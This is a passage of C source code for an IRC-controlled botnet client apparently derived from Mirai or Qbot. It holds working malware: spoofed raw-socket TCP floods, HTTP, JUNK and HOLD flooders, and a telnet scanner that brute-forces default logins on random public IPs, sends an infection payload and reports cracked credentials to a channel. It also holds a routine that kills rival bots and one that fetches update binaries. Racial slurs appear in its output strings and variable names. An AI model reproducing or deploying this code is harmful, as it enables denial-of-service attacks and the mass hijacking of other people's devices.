++pc;
}
for ( ; width > 0; --width) {
printchar (out, padchar);
++pc;
}
return pc;
}
static int printi(unsigned char **out, int i, int b, int sg, int width, int pad, int letbase) {
unsigned char print_buf[PRINT_BUF_LEN];
register unsigned char *s;
register int t, neg = 0, pc = 0;
register unsigned int u = i;
if (i == 0) {
print_buf[0] = '0';
print_buf[1] = '\0';
return prints (out, print_buf, width, pad);
}
if (sg && b == 10 && i < 0) {
neg = 1;
u = -i;
}
s = print_buf + PRINT_BUF_LEN-1;
*s = '\0';
while (u) {
t = u % b;
if( t >= 10 )
t += letbase - '0' - 10;
*--s = t + '0';
u /= b;
}
if (neg) {
if( width && (pad & PAD_ZERO) ) {
printchar (out, '-');
++pc;
--width;
}
else {
*--s = '-';
}
}
return pc + prints (out, s, width, pad);
}
static int print(unsigned char **out, const unsigned char *format, va_list args ) {
register int width, pad;
register int pc = 0;
unsigned char scr[2];
for (; *format != 0; ++format) {
if (*format == '%') {
++format;
width = pad = 0;
if (*format == '\0') break;
if (*format == '%') goto out;
if (*format == '-') {
++format;
pad = PAD_RIGHT;
}
while (*format == '0') {
++format;
pad |= PAD_ZERO;
}
for ( ; *format >= '0' && *format <= '9'; ++format) {
width *= 10;
width += *format - '0';
}
if( *format == 's' ) {
register char *s = (char *)va_arg( args, int );
pc += prints (out, s?s:"(null)", width, pad);
continue;
}
if( *format == 'd' ) {
pc += printi (out, va_arg( args, int ), 10, 1, width, pad, 'a');
continue;
}
if( *format == 'x' ) {
pc += printi (out, va_arg( args, int ), 16, 0, width, pad, 'a');
continue;
}
if( *format == 'X' ) {
pc += printi (out, va_arg( args, int ), 16, 0, width, pad, 'A');
continue;
}
if( *format == 'u' ) {
pc += printi (out, va_arg( args, int ), 10, 0, width, pad, 'a');
continue;
}
if( *format == 'c' ) {
scr[0] = (unsigned char)va_arg( args, int );
scr[1] = '\0';
pc += prints (out, scr, width, pad);
continue;
}
}
else {
out:
printchar (out, *format);
++pc;
}
}
if (out) **out = '\0';
va_end( args );
return pc;
}
int szprintf(unsigned char *out, const unsigned char *format, ...) {
va_list args;
va_start( args, format );
return print( &out, format, args );
}
in_addr_t getRandomPublicIP() { // Mirai IP range blocks added By Bit-Dealer/Bit-Dealer :D
static uint8_t ipState[4] = {0};
ipState[0] = rand() % 223;
ipState[1] = rand() % 255;
ipState[2] = rand() % 255;
ipState[3] = rand() % 255;
while(
(ipState[0] == 0) ||
(ipState[0] == 10) ||
(ipState[0] == 100 && (ipState[1] >= 64 && ipState[1] <= 127)) ||
(ipState[0] == 127) ||
(ipState[0] == 169 && ipState[1] == 254) ||
(ipState[0] == 172 && (ipState[1] <= 16 && ipState[1] <= 31)) ||
(ipState[0] == 192 && ipState[1] == 0 && ipState[2] == 2) ||
(ipState[0] == 192 && ipState[1] == 88 && ipState[2] == 99) ||
(ipState[0] == 192 && ipState[1] == 168) ||
(ipState[0] == 198 && (ipState[1] == 18 || ipState[1] == 19)) ||
(ipState[0] == 198 && ipState[1] == 51 && ipState[2] == 100) ||
(ipState[0] == 203 && ipState[1] == 0 && ipState[2] == 113) ||
(ipState[0] >= 224)
)
{
ipState[0] = rand() % 223;
ipState[1] = rand() % 255;
ipState[2] = rand() % 255;
ipState[3] = rand() % 255;
}
char ip[16] = {0};
szprintf(ip, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);
return inet_addr(ip);
}
void SendTCP(void *par1) {
struct tcp_thread_data *td = (struct thread_data *)par1;
unsigned char *target = td->target;
int port = td->port;
int timeEnd = td->secs;
unsigned char *flags = td->flags;
int packetsize = td->packetsize;
int pollinterval = td->pollinterval;
int spoofit = td->spoofit;
register unsigned int pollRegister;
pollRegister = pollinterval;
struct sockaddr_in dest_addr;
dest_addr.sin_family = AF_INET;
if(port == 0) dest_addr.sin_port = rand_cmwc();
else dest_addr.sin_port = htons(port);
if(getHost(target, &dest_addr.sin_addr)) return;
memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
int sockfd = socket(AF_INET, SOCK_RAW, IPPROTO_TCP);
if(!sockfd) { return; }
int tmp = 1;
if(setsockopt(sockfd, IPPROTO_IP, IP_HDRINCL, &tmp, sizeof (tmp)) < 0) { return; }
in_addr_t netmask;
if ( spoofit == 0 ) netmask = ( ~((in_addr_t) -1) );
else netmask = ( ~((1 << (32 - spoofit)) - 1) );
unsigned char packet[sizeof(struct iphdr) + sizeof(struct tcphdr) + packetsize];
struct iphdr *iph = (struct iphdr *)packet;
struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr);
makeIPPacket(iph, dest_addr.sin_addr.s_addr, htonl( getRandomPublicIP(netmask) ), IPPROTO_TCP, sizeof(struct tcphdr) + packetsize);
tcph->source = rand_cmwc();
tcph->seq = rand_cmwc();
tcph->ack_seq = 0;
tcph->doff = 5;
if(!strcmp(flags, "all")) {
tcph->syn = 1;
tcph->rst = 1;
tcph->fin = 1;
tcph->ack = 1;
tcph->psh = 1;
tcph->urg = 1;
} else if(!strcmp(flags, "xmas")) {
tcph->fin = 1;
tcph->psh = 1;
tcph->urg = 1;
} else if(!strcmp(flags, "usyn")) {
tcph->syn = 1;
tcph->urg = 1;
} else {
unsigned char *pch = strtok(flags, ",");
while(pch) {
if(!strcmp(pch, "syn")) { tcph->syn = 1;
} else if(!strcmp(pch, "rst")) { tcph->rst = 1;
} else if(!strcmp(pch, "fin")) { tcph->fin = 1;
} else if(!strcmp(pch, "ack")) { tcph->ack = 1;
} else if(!strcmp(pch, "psh")) { tcph->psh = 1;
} else if(!strcmp(pch, "urg")) { tcph->urg = 1;
} else {
}
pch = strtok(NULL, ",");
}
}
tcph->window = rand_cmwc();
tcph->check = 0;
tcph->urg_ptr = 0;
tcph->dest = (port == 0 ? rand_cmwc() : htons(port));
tcph->check = csum(iph, tcph);
iph->check = csum ((unsigned short *) packet, iph->tot_len);
int end = time(NULL) + timeEnd;
register unsigned int i = 0;
while(1) {
sendto(sockfd, packet, sizeof(packet), 0, (struct sockaddr *)&dest_addr, sizeof(dest_addr));
iph->saddr = htonl( getRandomPublicIP() );
iph->id = rand_cmwc();
tcph->seq = rand_cmwc();
tcph->source = rand_cmwc();
tcph->check = 0;
tcph->check = csum(iph, tcph);
iph->check = csum ((unsigned short *) packet, iph->tot_len);
if(i == pollRegister) {
if(time(NULL) > end) break;
i = 0;
continue;
}
i++;
}
}
void tcpflood(int sock, char *sender, int argc, char **argv) { // Advanced TCP flooder. Multithreading added by Bit-Dealer/Bit-Dealer.
if (mfork(sender) != 0) return;
if(argc < 6 || atoi(argv[3]) == -1 || atoi(argv[2]) == -1 || (argc > 5 && atoi(argv[5]) < 0) || (argc == 7 && atoi(argv[6]) < 1)) {
Send(sock, "NOTICE %s :TCP <target> <port> <time> <flags/method> <packetsize> <pollinterval> <threads>\n", sender);
return;
}
unsigned char *ip = argv[1];
int port = atoi(argv[2]);
int time = atoi(argv[3]);
unsigned char *flags = argv[4];
int packetsize = argc > 5 ? atoi(argv[5]) : 0;
int pollinterval = argc == 7 ? atoi(argv[6]) : 10;
int num_threads = atoi(argv[7]);
int spoofed = 32;
struct sockaddr_in sin;
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = inet_addr(argv[1]);
pthread_t thread[num_threads];
struct tcp_thread_data td[num_threads];
unsigned char *hi = strtok(ip, ",");
int i;
for(i = 0; i < num_threads - 1; i++){
td[i].target = i;
td[i].port = port;
td[i].secs = time;
td[i].flags = flags;
td[i].packetsize = packetsize;
td[i].pollinterval = pollinterval;
td[i].spoofit = spoofed;
pthread_create(&thread[i], NULL, &SendTCP, (void *) &td[i]);
}
Send(sock, "NOTICE %s :TCP flooding %s:%d with %s and %d threads\n", sender, hi, port, flags, num_threads);
sleep(time);
exit(0);
}
int socket_connect(char *host, unsigned short int port) {
struct hostent *hp;
struct sockaddr_in addr;
int on = 1, sock;
if ((hp = gethostbyname(host)) == NULL) return 0;
bcopy(hp->h_addr, &addr.sin_addr, hp->h_length);
addr.sin_port = htons(port);
addr.sin_family = AF_INET;
sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
setsockopt(sock, IPPROTO_TCP, TCP_NODELAY, (const char *)&on, sizeof(int));
if (sock == -1) return 0;
if (connect(sock, (struct sockaddr *)&addr, sizeof(struct sockaddr_in)) == -1) return 0;
return sock;
}
void SendHTTP(char *method, char *host, unsigned short int port, char *path, int timeEnd, int power) {
int socket, i, end = time(NULL) + timeEnd, sendIP = 0;
char request[512], buffer[1];
for (i = 0; i < power; i++) {
if (fork()) {
while (end > time(NULL)) {
sprintf(request, "%s %s HTTP/1.1\r\nHost: %s\r\nUser-Agent: %s\r\nConnection: close\r\n\r\n", method, path, host, UserAgents[(rand() % 36)]);
socket = socket_connect(host, port);
if (socket != 0) {
write(socket, request, strlen(request));
read(socket, buffer, 1);
close(socket);
}
}
exit(0);
}
}
}
void *HTTP(int sock, char *sender, int argc, char **argv) {
// !* HTTP METHOD TARGET PORT PATH TIME POWER
// !* HTTP GET hackforums.net 80 / 10 100
if (mfork(sender) != 0) return;
if (argc < 6 || atoi(argv[3]) < 1 || atoi(argv[5]) < 1) {
Send(sock, "NOTICE %s :HTTP <method> <target> <port> <path> <time> <power> = An extremely powerful HTTP flooder added by Bit-Dealer\n", sender);
return;
}
SendHTTP(argv[1], argv[2], atoi(argv[3]), argv[4], atoi(argv[5]), atoi(argv[6]));
exit(0);
}
// __ __ ___ _ _
// \ \ /\ /\ /\ \ \/\ /\ / __\ | ___ ___ __| |
// \ \/ / \ \/ \/ / //_/ / _\ | |/ _ \ / _ \ / _` |
// /\_/ /\ \_/ / /\ / __ \ / / | | (_) | (_) | (_| |
// \___/ \___/\_\ \/\/ \/ \/ |_|\___/ \___/ \__,_|
void sendJUNK(unsigned char *ip, int port, int end_time)
{
int max = getdtablesize() / 2, i;
struct sockaddr_in dest_addr;
dest_addr.sin_family = AF_INET;
dest_addr.sin_port = htons(port);
if(getHost(ip, &dest_addr.sin_addr)) return;
memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
struct state_t
{
int fd;
uint8_t state;
} fds[max];
memset(fds, 0, max * (sizeof(int) + 1));
fd_set myset;
struct timeval tv;
socklen_t lon;
int valopt, res;
unsigned char *watwat = malloc(8192);
memset(watwat, 0, 8192);
int packetLen = 1024;
int end = time(NULL) + end_time;
while(end > time(NULL))
{
for(i = 0; i < max; i++)
{
switch(fds[i].state)
{
case 0:
{
fds[i].fd = socket(AF_INET, SOCK_STREAM, 0);
fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) | O_NONBLOCK);
if(connect(fds[i].fd, (struct sockaddr *)&dest_addr, sizeof(dest_addr)) != -1 || errno != EINPROGRESS) close(fds[i].fd);
else fds[i].state = 1;
}
break;
case 1:
{
FD_ZERO(&myset);
FD_SET(fds[i].fd, &myset);
tv.tv_sec = 0;
tv.tv_usec = 10000;
res = select(fds[i].fd+1, NULL, &myset, NULL, &tv);
if(res == 1)
{
lon = sizeof(int);
getsockopt(fds[i].fd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon);
if(valopt)
{
close(fds[i].fd);
fds[i].state = 0;
} else {
fds[i].state = 2;
}
} else if(res == -1)
{
close(fds[i].fd);
fds[i].state = 0;
}
}
break;
case 2:
{
//nonblocking sweg
packetLen = realrand(32, 8192);
makeRandomShit(watwat, packetLen);
if(send(fds[i].fd, watwat, packetLen, MSG_NOSIGNAL) == -1 && errno != EAGAIN)
{
close(fds[i].fd);
fds[i].state = 0;
}
}
break;
}
}
}
}
char *junk(int sock, char *sender, int argc, char **argv) {
if(argc < 3 || atoi(argv[3]) < 0) {
Send(sock, "NOTICE %s :JUNK <ip> <port> <time>\n", sender);
return;
}
if(mfork(sender) != 0) return;
Send(sock, "NOTICE %s :JUNK flooding %s:%s\n", sender, argv[1], argv[2]);
sendJUNK(argv[1], atoi(argv[2]), atoi(argv[3]));
}
// _ _ ___ _ _
// /\ /\___ | | __| | / __\ | ___ ___ __| |
// / /_/ / _ \| |/ _` | / _\ | |/ _ \ / _ \ / _` |
// / __ / (_) | | (_| | / / | | (_) | (_) | (_| |
// \/ /_/ \___/|_|\__,_| \/ |_|\___/ \___/ \__,_|
void sendHOLD(unsigned char *ip, int port, int end_time)
{
int max = getdtablesize() / 2, i;
struct sockaddr_in dest_addr;
dest_addr.sin_family = AF_INET;
dest_addr.sin_port = htons(port);
if(getHost(ip, &dest_addr.sin_addr)) return;
memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
struct state_t
{
int fd;
uint8_t state;
} fds[max];
memset(fds, 0, max * (sizeof(int) + 1));
fd_set myset;
struct timeval tv;
socklen_t lon;
int valopt, res;
int end = time(NULL) + end_time;
while(end > time(NULL))
{
for(i = 0; i < max; i++)
{
switch(fds[i].state)
{
case 0:
{
fds[i].fd = socket(AF_INET, SOCK_STREAM, 0);
fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) | O_NONBLOCK);
if(connect(fds[i].fd, (struct sockaddr *)&dest_addr, sizeof(dest_addr)) != -1 || errno != EINPROGRESS) close(fds[i].fd);
else fds[i].state = 1;
}
break;
case 1:
{
FD_ZERO(&myset);
FD_SET(fds[i].fd, &myset);
tv.tv_sec = 0;
tv.tv_usec = 10000;
res = select(fds[i].fd+1, NULL, &myset, NULL, &tv);
if(res == 1)
{
lon = sizeof(int);
getsockopt(fds[i].fd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon);
if(valopt)
{
close(fds[i].fd);
fds[i].state = 0;
} else {
fds[i].state = 2;
}
} else if(res == -1)
{
close(fds[i].fd);
fds[i].state = 0;
}
}
break;
case 2:
{
FD_ZERO(&myset);
FD_SET(fds[i].fd, &myset);
tv.tv_sec = 0;
tv.tv_usec = 10000;
res = select(fds[i].fd+1, NULL, NULL, &myset, &tv);
if(res != 0)
{
close(fds[i].fd);
fds[i].state = 0;
}
}
break;
}
}
}
}
char *hold(int sock, char *sender, int argc, char **argv) {
if(argc < 3 || atoi(argv[3]) < 0) {
Send(sock, "NOTICE %s :HOLD <ip> <port> <time>\n", sender);
return;
}
if(mfork(sender) != 0) return;
Send(sock, "NOTICE %s :HOLD flooding %s:%s\n", sender, argv[1], argv[2]);
sendHOLD(argv[1], atoi(argv[2]), atoi(argv[3]));
}
int negotiate(int sock, unsigned char *buf, int len) {
unsigned char c;
switch (buf[1]) {
case CMD_IAC: return 0;
case CMD_WILL:
case CMD_WONT:
case CMD_DO:
case CMD_DONT:
c = CMD_IAC;
send(sock, &c, 1, MSG_NOSIGNAL);
if (CMD_WONT == buf[1]) c = CMD_DONT;
else if (CMD_DONT == buf[1]) c = CMD_WONT;
else if (OPT_SGA == buf[1]) c = (buf[1] == CMD_DO ? CMD_WILL : CMD_DO);
else c = (buf[1] == CMD_DO ? CMD_WONT : CMD_DONT);
send(sock, &c, 1, MSG_NOSIGNAL);
send(sock, &(buf[2]), 1, MSG_NOSIGNAL);
break;
default:
break;
}
return 0;
}
int contains_string(char* buffer, char** strings) {
int num_strings = 0, i = 0;
for(num_strings = 0; strings[++num_strings] != 0; );
for(i = 0; i < num_strings; i++) {
if(strcasestr(buffer, strings[i])) {
return 1;
}
}
return 0;
}
int contains_success(char* buffer) {
return contains_string(buffer, successes);
}
int contains_fail(char* buffer) {
return contains_string(buffer, fails);
}
int contains_response(char* buffer) {
return contains_success(buffer) || contains_fail(buffer);
}
int read_with_timeout(int fd, int timeout_usec, char* buffer, int buf_size) {
fd_set read_set;
struct timeval tv;
tv.tv_sec = 0;
tv.tv_usec = timeout_usec;
FD_ZERO(&read_set);
FD_SET(fd, &read_set);
if (select(fd+1, &read_set, NULL, NULL, &tv) < 1)
return 0;
return recv(fd, buffer, buf_size, 0);
}
int read_until_response(int fd, int timeout_usec, char* buffer, int buf_size, char** strings) {
int num_bytes, i;
memset(buffer, 0, buf_size);
num_bytes = read_with_timeout(fd, timeout_usec, buffer, buf_size);
if(buffer[0] == 0xFF) {
negotiate(fd, buffer, 3);
}
if(contains_string(buffer, strings)) {
return 1;
}
return 0;
}
const char* get_telstate_host(struct telstate_t* telstate) { // get host
struct in_addr in_addr_ip;
in_addr_ip.s_addr = telstate->ip;
return inet_ntoa(in_addr_ip);
}
void advance_telstate(struct telstate_t* telstate, int new_state) { // advance
if(new_state == 0) {
close(telstate->fd);
}
telstate->tTimeout = 0;
telstate->state = new_state;
memset((telstate->sockbuf), 0, SOCKBUF_SIZE);
}
void reset_telstate(struct telstate_t* telstate) { // reset
advance_telstate(telstate, 0);
telstate->complete = 1;
}
void TelnetScanner(int wait_usec, int maxfds, int sock) {
if(fork() == -1) return;
int max = getdtablesize() - 100, i, res, num_tmps, j;
char buf[128], cur_dir;
if (max > maxfds)
max = maxfds;
fd_set fdset;
struct timeval tv;
socklen_t lon;
int valopt;
char line[256];
char* buffer;
struct sockaddr_in dest_addr;
dest_addr.sin_family = AF_INET;
dest_addr.sin_port = htons(23);
memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
buffer = malloc(SOCKBUF_SIZE + 1);
memset(buffer, 0, SOCKBUF_SIZE + 1);
struct telstate_t fds[max];
memset(fds, 0, max * (sizeof(int) + 1));
for(i = 0; i < max; i++)
{
memset(&(fds[i]), 0, sizeof(struct telstate_t));
fds[i].complete = 1;
fds[i].sockbuf = buffer;
}
while(1) {
for(i = 0; i < max; i++) {
if(fds[i].tTimeout == 0) {
fds[i].tTimeout = time(NULL);
}
switch(fds[i].state) {
case 0:
{
if(fds[i].complete == 1)
{
char *tmp = fds[i].sockbuf;
memset(&(fds[i]), 0, sizeof(struct telstate_t));
fds[i].sockbuf = tmp;
fds[i].ip = getRandomPublicIP();
}
else if(fds[i].complete == 0)
{
fds[i].usernameInd++;
fds[i].passwordInd++;
if(fds[i].passwordInd == sizeof(Telnet_Passwords) / sizeof(char *))
{
fds[i].complete = 1;
continue;
}
if(fds[i].usernameInd == sizeof(Telnet_Usernames) / sizeof(char *))
{
fds[i].complete = 1;
continue;
}
}
dest_addr.sin_family = AF_INET;
dest_addr.sin_port = htons(23);
memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
dest_addr.sin_addr.s_addr = fds[i].ip;
fds[i].fd = socket(AF_INET, SOCK_STREAM, 0);
if(fds[i].fd == -1) continue;
fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) | O_NONBLOCK);
if(connect(fds[i].fd, (struct sockaddr *)&dest_addr, sizeof(dest_addr)) == -1 && errno != EINPROGRESS)
{
reset_telstate(&fds[i]);
}
else
{
advance_telstate(&fds[i], 1);
}
}
break;
case 1:
{
FD_ZERO(&fdset);
FD_SET(fds[i].fd, &fdset);
tv.tv_sec = 0;
tv.tv_usec = wait_usec;
res = select(fds[i].fd+1, NULL, &fdset, NULL, &tv);
if(res == 1) {
fds[i].tTimeout = 0;
lon = sizeof(int);
valopt = 0;
getsockopt(fds[i].fd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon);
if(valopt)
{
reset_telstate(&fds[i]);
}
else
{
fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) & (~O_NONBLOCK));
advance_telstate(&fds[i], 2);
}
continue;
}
else if(res == -1)
{
reset_telstate(&fds[i]);
continue;
}
if(fds[i].tTimeout + 7 < time(NULL))
{
reset_telstate(&fds[i]);
}
}
break;
case 2:
{
if(read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, SOCKBUF_SIZE, advances))
{
fds[i].tTimeout = time(NULL);
if(contains_fail(fds[i].sockbuf))
{
advance_telstate(&fds[i], 0);
}
else
{
advance_telstate(&fds[i], 3);
}
continue;
}
if(fds[i].tTimeout + 7 < time(NULL))
{
reset_telstate(&fds[i]);
}
}
break;
case 3:
{
if(send(fds[i].fd, Telnet_Usernames[fds[i].usernameInd], strlen(Telnet_Usernames[fds[i].usernameInd]), MSG_NOSIGNAL) < 0)
{
reset_telstate(&fds[i]);
continue;
}
if(send(fds[i].fd, "\r\n", 2, MSG_NOSIGNAL) < 0)
{
reset_telstate(&fds[i]);
continue;
}
advance_telstate(&fds[i], 4);
}
break;
case 4:
{
if(read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, SOCKBUF_SIZE, advances))
{
fds[i].tTimeout = time(NULL);
if(contains_fail(fds[i].sockbuf))
{
advance_telstate(&fds[i], 0);
}
else
{
advance_telstate(&fds[i], 5);
}
continue;
}
if(fds[i].tTimeout + 7 < time(NULL))
{
reset_telstate(&fds[i]);
}
}
break;
case 5:
{
if(send(fds[i].fd, Telnet_Passwords[fds[i].passwordInd], strlen(Telnet_Passwords[fds[i].passwordInd]), MSG_NOSIGNAL) < 0)
{
reset_telstate(&fds[i]);
continue;
}
if(send(fds[i].fd, "\r\n", 2, MSG_NOSIGNAL) < 0)
{
reset_telstate(&fds[i]);
continue;
}
advance_telstate(&fds[i], 6);
}
break;
case 6:
{
if(read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, SOCKBUF_SIZE, advances2))
{
fds[i].tTimeout = time(NULL);
if(contains_fail(fds[i].sockbuf))
{
advance_telstate(&fds[i], 0);
}
else if(contains_success(fds[i].sockbuf))
{
if(fds[i].complete == 2)
{
advance_telstate(&fds[i], 7);
}
else
{
Send(sock, "PRIVMSG %s :[TELNET] [+] LOGIN CRACKED ---> %s:%s:%s\n", CHAN, get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
advance_telstate(&fds[i], 7);
}
}
else
{
reset_telstate(&fds[i]);
}
continue;
}
if(fds[i].tTimeout + 7 < time(NULL)) {
reset_telstate(&fds[i]);
}
}
break;
case 7:
{
fds[i].tTimeout = time(NULL);
if(send(fds[i].fd, Telnet_Payload, strlen(Telnet_Payload), MSG_NOSIGNAL) < 0) {
Send(sock, "PRIVMSG %s :[TELNET] [+] PAYLOAD SENT ---> %s:%s:%s\n", CHAN, inet_ntoa(*(struct in_addr *)&(fds[i].ip)), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
if(read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, SOCKBUF_SIZE, "NULLZSEC ROCKS") && fds[i].complete != 3) {
if(strcasestr(fds[i].sockbuf, "NULLZSEC ROCKS") && fds[i].complete != 3) {
Send(sock, "PRIVMSG %s :[TELNET] [+] SUCCESSFUL INFECTION ---> %s:%s:%s\n", CHAN, inet_ntoa(*(struct in_addr *)&(fds[i].ip)), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
reset_telstate(&fds[i]);
continue;
}
}
} else {
Send(sock, "PRIVMSG %s :[TELNET] [-] FAILED TO SEND PAYLOAD ---> %s:%s:%s\n", CHAN, inet_ntoa(*(struct in_addr *)&(fds[i].ip)), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
reset_telstate(&fds[i]);
continue;
}
if(fds[i].tTimeout + 60 < time(NULL)) {
if(fds[i].complete!=3) {
Send(sock, "PRIVMSG %s :[TELNET] [-] FAILED TO INFECT ---> %s:%s:%s\n", CHAN, get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
}
reset_telstate(&fds[i]);
}
break;
}
}
}
}
}
void dickScanner(int sock) {
uint32_t parent;
parent = fork();
int forks = sysconf(_SC_NPROCESSORS_ONLN);
int fds = 999999;
if(forks == 1) fds = 500;
if(forks >= 2) fds = 1000;
if(parent > 0) {
scanPid = parent;
return;
}
else if(parent == -1) return;
int ii;
for(ii = 0; ii < forks; ii++) {
srand((time(NULL) ^ getpid()) + getppid());
init_rand(time(NULL) ^ getpid());
TelnetScanner(100, fds, sock);
}
return;
}
void doScanner(int sock, char *sender, int argc, char **argv) {
if(argc < 1) {
Send(sock, "NOTICE %s :SCANNER <ON/OFF>\n", chan);
return;
}
if(mfork(sender) != 0) return;
if(!strcmp(argv[1], "ON")) {
if(scanPid == 0) {
dickScanner(sock);
if(scanPid != 0) {
Send(sock, "PRIVMSG %s :[TELNET] [+] SCANNER STARTED!\n", chan); //Scanner has been started successfully!!!
} else {
Send(sock, "PRIVMSG %s :[TELNET] [-] FAILED TO START SCANNER!\n", chan); //fuk ;-;
}
} else {
Send(sock, "PRIVMSG %s :[TELNET] [+] SCANNER ALREADY STARTED!\n", chan);
}
} else if(!strcmp(argv[1], "OFF") == 0) {
if(scanPid != 0) {
if(kill(scanPid, 9) == 0) {
Send(sock, "PRIVMSG %s :[TELNET] [+] SCANNER KILLED!\n", chan);
} else {
Send(sock, "PRIVMSG %s :[TELNET] [-] FAILED TO KILL SCANNER!\n", chan);
}
} else {
Send(sock, "PRIVMSG %s :[TELNET] [+] SCANNER NOT STARTED!\n", chan);
}
} else {
Send(sock, "NOTICE %s :SCANNER <ON/OFF>\n", chan);
}
exit(0);
}
pid_t proc_find(const char* name)
{
DIR* dir;
struct dirent* ent;
char* endptr;
char buf[512];
if (!(dir = opendir("/proc"))) {
perror("can't open /proc");
return -1;
}
while((ent = readdir(dir)) != NULL) {
/* if endptr is not a null character, the directory is not
* entirely numeric, so ignore it */
long lpid = strtol(ent->d_name, &endptr, 10);
if (*endptr != '\0') {
continue;
}
/* try to open the cmdline file */
snprintf(buf, sizeof(buf), "/proc/%ld/cmdline", lpid);
FILE* fp = fopen(buf, "r");
if (fp) {
if (fgets(buf, sizeof(buf), fp) != NULL) {
/* check the first token in the file, the program name */
char* first = strtok(buf, " ");
if (!strcmp(first, name)) {
fclose(fp);
closedir(dir);
return (pid_t)lpid;
}
}
fclose(fp);
}
}
closedir(dir);
return -1;
}
char* getexename(pid_t pid)
{
char *buf[128];
int size = 128;
char linkname[64]; /* /proc/<pid>/exe */
int ret;
if (snprintf(linkname, sizeof(linkname), "/proc/%i/exe", pid) < 0)
{
/* This should only happen on large word systems. I'm not sure
what the proper response is here.
Since it really is an assert-like condition, aborting the
program seems to be in order. */
return NULL;
}
/* Now read the symbolic link */
ret = readlink(linkname, buf, size);
/* In case of an error, leave the handling up to the caller */
if (ret == -1)
return NULL;
/* Report insufficient buffer size */
if (ret >= size)
{
errno = ERANGE;
return NULL;
}
/* Ensure proper NULL termination */
buf[ret] = 0;
return buf;
}
void botkill() { // Epic botkiller added by Bit-Dealer
int i, status;
pid_t PID = -1;
char *botLocation;
for (i = 0; i < NUMITEMS(Bot_Killer_Binarys); i++) {
printf("Scanning for bot %s.\n", Bot_Killer_Binarys[i]);
PID = proc_find(Bot_Killer_Binarys[i]);
if (PID == -1) {
// Bot process does not exist. Do nothing.
} else {
printf("Killing bot %s PID %d.\n", Bot_Killer_Binarys[i], PID);
botLocation = getexename(PID);
if(kill(PID, 9) == 0) {
botskilled++;
}
if(botLocation != NULL) {
printf("Bot %s found at %s Deleting...\n", Bot_Killer_Binarys[i], botLocation);
status = remove(botLocation);
if(status == 0) {
printf("Bot %s niggered successfully.\n", botLocation);
botsniggered++;
} else {
printf("Unable to nigger bot %s.\n", botLocation);
}
} else {
printf("Bot %s was not found on the system. It must have been running in memory.", Bot_Killer_Binarys[i]);
}
}
}
printf("Botkill finished. %d bots killed and %d bots niggered.\n", botskilled, botsniggered);
}
void cleanDevice(int sock, char *sender, int argc, char **arv) {
if(mfork(sender) != 0) return;
botkill();
Send(sock, "NOTICE %s :%d bots killed and %d bots niggered.\n", sender);
botskilled = 0;
botsniggered = 0;
exit(0);
}
char *getPublicIP() {
int fd;
struct ifreq ifr;
char *ip[16];
fd = socket(AF_INET, SOCK_DGRAM, 0);
ifr.ifr_addr.sa_family = AF_INET;
snprintf(ifr.ifr_name, IFNAMSIZ, "eth0");
ioctl(fd, SIOCGIFADDR, &ifr);
/* and more importantly */
sprintf(ip, "%s", inet_ntoa(((struct sockaddr_in *)&ifr.ifr_addr)->sin_addr));
close(fd);
return ip;
}
void dns2ip(int sock, char *sender, int argc, char **argv) {
if (mfork(sender) != 0) return;
if (argc > 1) {
char ip[16];
strncpy(ip, inet_ntoa( *((struct in_addr*) gethostbyname(argv[1])->h_addr_list[0])), 16 );
Send(sock, "NOTICE %s :%s resolves to %s\n", sender, argv[1], ip);
} else {
Send(sock, "NOTICE %s :DNS2IP <domain>\n", sender);
}
exit(0);
}
void ip2dns(int sock, char *sender, int argc, char **argv) {
if (mfork(sender) != 0) return;
int socketnigger = socket_connect(argv[1], 80);
char host[1024];
char service[20];
strcpy(service, "http");
if (argc > 2) {
if(socketnigger >= 1) { // Use port 80 for socket
if(getnameinfo(&socketnigger, sizeof socketnigger, host, sizeof host, service, sizeof service, NI_NAMEREQD) == 0) {
Send(sock, "NOTICE %s :%s resolves to %s\n", sender, argv[1], host);
close(sock);
} else {
Send(sock, "NOTICE %s :Failed to resolve %s\n", sender, argv[1]);
}
} else {
Send(sock, "NOTICE %s :Failed to connect to %s\n", sender, argv[1]);
}
} else {
Send(sock, "NOTICE %s :IP2DNS <ip> <open port>\n", sender);
}
exit(0);
}
void getip(int sock, char *sender, int argc, char **argv) {
if (mfork(sender) != 0) return;
Send(sock, "NOTICE %s :My IP is %s\n", sender, getPublicIP());
exit(0);
}
void update(int sock, char *sender, int argc, char **argv) {
int sock2,i,d;
struct sockaddr_in server;
unsigned long ipaddr;
unsigned char dgcc;
char buf[1024], *file;
FILE *gcc;
int parent=getpid();
if (mfork(sender) != 0) return;
if (argc < 2) {
Send(sock, "NOTICE %s :UPDATEHTTP <host> <src:bin>\n", sender);
exit(0);
}
if ((sock2 = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
